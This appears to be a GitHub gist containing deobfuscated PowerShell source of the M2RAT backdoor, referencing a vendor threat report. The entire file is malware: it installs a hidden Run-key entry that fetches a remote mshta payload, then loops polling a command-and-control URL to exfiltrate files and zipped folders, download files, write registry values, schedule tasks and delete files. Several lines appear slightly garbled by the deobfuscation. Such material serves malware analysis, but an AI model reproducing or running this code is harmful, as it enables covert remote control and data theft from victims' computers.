Last active
September 25, 2023 06:03
-
-
Save Sh1n0g1/b39b0ee3e7574f817fd24a2485bf043b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Deobfuscated M2RAT | |
# Refer: https://asec.ahnlab.com/en/56857/ | |
Start-Sleep -Seconds 68; | |
$buffer = 1024 * 1024; | |
$hostid = $env:COMPUTERNAME + '-' + $env:USERNAME; | |
$C2_URL = 'http://navercorp.ru/dashboard/image/202302/com.php' + '?U=' + $hostid; | |
$TEMPORARY_FILE = $env:TEMP + '\jXShAegMEWMw'; | |
if (!(Test-Path$TEMPORARY_FILE)) { | |
New-ItemProperty -Path HKCU:\Software\ Microsoft\Windows\CurrentVersion\Run -Name fGZtM -Value 'c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta http://navercorp.ru/dashboard/image/202302/4.html' -PropertyType String -Force; | |
} | |
function Connect-C2($URL, $data) { | |
$bytes = [System.Text.Encoding]::UTF8.GetBytes($data); | |
[System.Net.HttpWebRequest] $wc = [System.Net.WebRequest]::Create($URL); | |
$wc.Method = 'POST'; | |
$wc.ContentType = 'application/x-www-form-urlencoded'; | |
$wc.ContentLength = $bytes.Length; | |
$request_stream = $wc.GetRequestStream(); | |
$request_stream.Write($bytes, 0, $bytes.Length); | |
$request_stream.Flush(); | |
$request_stream.Close(); | |
[System.Net.HttpWebResponse] $res = $wc.GetResponse(); | |
$response_stream = New-Object System.IO.StreamReader($res.GetResponseStream()); | |
$response_string = $response_stream.ReadToEnd(); | |
return $response_string; | |
} | |
function Send-File($URL, $filename, $attachment_name, $attachment_filename) { | |
$Timeout = 10000000; | |
$CRLF = [string] $([char] 0x0D) + [string] $([char] 0x0A); | |
$TwoHyphens = '--'; | |
$Boundary = '*****'; | |
$stream = [System.IO.File]::OpenRead($filename); | |
$LrB = New-Object byte[] $buffer; | |
while ($bytesRead = $stream.Read($LrB, 0, $buffer)) { | |
[System.Net.HttpWebRequest] $wc = [System.Net.WebRequest]::Create($URL); | |
$wc.Method = 'POST'; | |
$wc.Timeout = $Timeout; | |
$wc.ContentType = 'multipart/form-data;boundary=' + $Boundary; | |
$request_stream = $wc.GetRequestStream(); | |
$heading1 = [System.Text.Encoding]::UTF8.GetBytes($TwoHyphens + $Boundary + $CRLF); | |
$request_stream.Write($heading1, 0, $heading1.Length); | |
$heading2 = [System.Text.Encoding]::UTF8.GetBytes('Content-Disposition: form-data; name=' + [string] $([char] 0x22) + $attachment_name + [string] $([char] 0x22) + ';filename=' + [string] $([char] 0x22) + $attachment_filename + [string] $([char] 0x22) + $CRLF); | |
$request_stream.Write($heading2, 0, $heading2.Length); | |
$heading3 = [System.Text.Encoding]::UTF8.GetBytes($CRLF); | |
$request_stream.Write($heading3, 0, $heading3.Length); | |
$request_stream.Write($LrB, 0, $bytesRead); | |
$request_stream.Write($heading3, 0, $heading3.Length); | |
$heading4 = [System.Text.Encoding]::UTF8.GetBytes($TwoHyphens + $Boundary + $TwoHyphens + $CRLF); | |
$request_stream.Write($heading4, 0, $heading4.Length); | |
$request_stream.Flush(); | |
$request_stream.Close(); | |
[System.Net.HttpWebResponse] $res = $wc.GetResponse(); | |
$response_stream = New-Object System.IO.StreamReader($res.GetResponseStream()); | |
$response_string = $response_stream.ReadToEnd(); | |
} | |
$stream.Close(); | |
} | |
function Download-File($URL, $filename) { | |
[System.Net.HttpWebRequest] $Request = [System.Net.WebRequest]::Create($URL); | |
$Request.set_Timeout(15000); | |
$Response = $Request.GetResponse(); | |
$ResponseStream = $Response.GetResponseStream(); | |
$SplitSize = 1024; | |
$Buffer = New-Object -TypeName Byte[] -ArgumentList $SplitSize; | |
Try { | |
Do { | |
$Count = $ResponseStream.Read($Buffer, 0, $SplitSize); | |
$offset = $Count -1; | |
Add-Content $filename $Buffer[0..$offset] -Encoding Byte; | |
} | |
Until($Count -eq 0) | |
} | |
Catch {} | |
Finally { | |
$ResponseStream.Dispose(); | |
} | |
} | |
do { | |
Try { | |
$c2_command = Connect-C2 $C2_URL ''; | |
If($c2_command -ne 'null' -and $c2_command -ne '') { | |
$c2_command = $c2_command.SubString(1, $c2_command.Length -2); | |
$c2_command_plain = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c2_command)); | |
if ($c2_command_plain) { | |
if ($c2_command_plain.Contains('fileinfo:')) { | |
$arg = $c2_command_plain.SubString(9); | |
if (Test-Path-Path $arg) { | |
$filename = $TEMPORARY_FILE + '.csv'; | |
Get-ChildItem $arg -Filter * .*-Recurse | Select-Object Name, Length, LastWriteTime, Fullname | Export-Csv -Path $filename -Force -NoTypeInformation -Encoding utf8; | |
$attachment_name = '_file'; | |
$nowtime = Get-Date -Format yyyy -MM -dd_HH_mm_ss; | |
$attachment_filename = $nowtime + '_fileinfo'; | |
Send-File $C2_URL $filename $attachment_name $attachment_filename; | |
Remove-Item -Path $filename; | |
} | |
} | |
if ($c2_command_plain.Contains('dir:')) { | |
$arg = $c2_command_plain.SubString(4); | |
if (Test-Path-Path $arg) { | |
$filename = $TEMPORARY_FILE + '.zip'; | |
Compress-Archive $arg $filename -Force; | |
$attachment_name = '_file'; | |
$nowtime = Get-Date -Format yyyy -MM -dd_HH_mm_ss; | |
$attachment_filename = $nowtime + '_dir'; | |
Send-File $C2_URL $filename $attachment_name $attachment_filename; | |
Remove-Item -Path $filename; | |
} | |
} | |
if ($c2_command_plain.Contains('file:')) { | |
$arg = $c2_command_plain.SubString(5); | |
if (Test-Path-Path $arg) { | |
$attachment_name = '_file'; | |
$nowtime = Get-Date -Format yyyy -MM -dd_HH_mm_ss; | |
$attachment_filename = $nowtime + '_file'; | |
Send-File $C2_URL $arg $attachment_name $attachment_filename; | |
} | |
} | |
if ($c2_command_plain.Contains('down:')) { | |
$arg = $c2_command_plain.SubString(5); | |
$CharArray = $arg.Split('||'); | |
if ($CharArray.Length -eq 3) { | |
Download-File $CharArray[0] $CharArray[2]; | |
$status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok')); | |
Connect-C2 $C2_URL $status; | |
} | |
} | |
if ($c2_command_plain.Contains('regedit:')) { | |
$arg = $c2_command_plain.SubString(8); | |
$CharArray = $arg.Split('||'); | |
if ($CharArray.Length -eq 5) { | |
New-ItemProperty -Path $CharArray[0] -Name $CharArray[2] -Value $CharArray[4] -PropertyType String -Force; | |
$status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok')); | |
Connect-C2 $C2_URL $status; | |
} | |
} | |
if ($c2_command_plain.Contains('task:')) { | |
$arg = $c2_command_plain.SubString(5); | |
$CharArray = $arg.Split('||'); | |
if ($CharArray.Length -eq 5) { | |
$Action = New-ScheduledTaskAction -Execute $CharArray[4]; | |
$Settings = New-ScheduledTaskSettingsSet; | |
$trigger = New-ScheduledTaskTrigger -Once -At(Get-Date) -RepetitionInterval(New -TimeSpan -Minutes 10); | |
$Task = New-ScheduledTask -Action $Action -Trigger $Trigger -Settings $Settings; | |
Register-ScheduledTask -TaskName $CharArray[2] -TaskPath $CharArray[0] -InputObject $Task; | |
$status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok')); | |
Connect-C2 $C2_URL $status; | |
} | |
} | |
if ($c2_command_plain.Contains('zip:')) { | |
$arg = $c2_command_plain.SubString(4); | |
$CharArray = $arg.Split('||'); | |
if ($CharArray.Length -eq 3) { | |
Expand -Archive $CharArray[0] $CharArray[2]; | |
$status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok')); | |
Connect-C2 $C2_URL $status; | |
} | |
} | |
if ($c2_command_plain.Contains('rename:')) { | |
$arg = $c2_command_plain.SubString(7); | |
$CharArray = $arg.Split('||'); | |
if ($CharArray.Length -eq 3) { | |
Rename-Item $CharArray[0] $CharArray[2]; | |
$status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok')); | |
Connect-C2 $C2_URL $status; | |
} | |
} | |
if ($c2_command_plain.Contains('del:')) { | |
$arg = $c2_command_plain.SubString(4); | |
if (Test-Path-Path $arg) { | |
Remove-Item $arg; | |
$status = 'R=' + [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('ok')); | |
Connect-C2 $C2_URL $status; | |
} | |
} | |
} | |
} | |
} | |
Catch {} | |
Start-Sleep -Seconds 5; | |
} while ($true -eq $true) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment